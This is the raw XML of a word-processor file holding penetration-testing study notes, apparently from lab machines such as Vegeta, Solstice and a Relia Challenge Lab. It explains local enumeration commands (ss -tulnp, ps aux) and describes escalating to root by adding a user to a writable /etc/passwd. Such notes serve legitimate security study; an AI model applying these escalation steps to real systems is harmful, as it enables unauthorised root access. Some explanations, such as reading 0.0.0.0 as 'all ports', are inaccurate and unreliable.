          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show numeric IP addresses and ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001611">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the PID and program name of the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001612">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001613">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001614">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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16">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cpdwj96pzkfj" w:id="184"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bash_history</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId435">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we looked at .bash_history, and saw that someone was trying to create a user Tom with root privileges and put it into /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001619">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170" name="image164.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image164.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43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61B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, this led us to investigate whether we had write privileges or not in /etc/passwd, and we ended having write privileges. So, we can just create any user we want, give it root privileges, and then log in as that user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000161E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information with step-by-step process can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add root user if /etc/passwd is writable</w:t>
      </w:r>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161F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001622">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wx8275jufl6" w:id="185"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001623">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001624">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine 192.168.xxx.246. We found a website on port 8000 listening only on local host. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001625">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="525" name="image541.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image541.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43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626">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Relia Challenge Lab .246 machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two are just DNS, so nothing special</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001628">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The third underlined one is a suspicious port 8000 which you can only access locally. This ended up being the attack vector. It's a website you can only access through port forwarding</w:t>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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a command used for privilege escalation and it is used to display listening network sockets on a Linux system</w:t>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t xml:space="preserve">Flags explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show TCP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show UDP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000162F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show only listening sockets (services waiting for incoming connections).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001630">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show numeric addresses and ports (prevents DNS lookup or service name resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001631">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="745"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the processes using the sockets (requires root privileges or capabilities like CAP_NET_ADMIN).</w:t>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t xml:space="preserve">Nmap vs. ss -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001634">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1409"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells you a lot about open ports and services, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gives you different and often deeper insights</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from a local perspective</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>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t xml:space="preserve">We saw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId438">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001637">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paid version of Medium Walkthrough </w:t>
      </w:r>
      <w:hyperlink r:id="rId439">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but just use freedium to make it free</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="180" name="image190.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image190.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44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63A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, 0.0.0.0 means listening on all ports, not just local host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The write up looks at port 631 and 57 first</w:t>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t xml:space="preserve">Port 57 (127.0.0.1:57) is a working web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="236" name="image230.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image230.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId441"/>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep -i 'root' --color=auto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001641">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2146300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="552" name="image550.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image550.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44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t xml:space="preserve">We see the output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means a PHP built-in development server is running locally (and it happens to be run by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Here's what each part means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php: This is the PHP interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-S 127.0.0.1:57: This tells PHP to start a local web server on IP 127.0.0.1 (localhost) and port 57.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only local connections can access this (not remote users).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t /var/tmp/sv/: This sets the document root, meaning all files served via HTTP will come from the /var/tmp/sv/ directory.</w:t>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drawing>
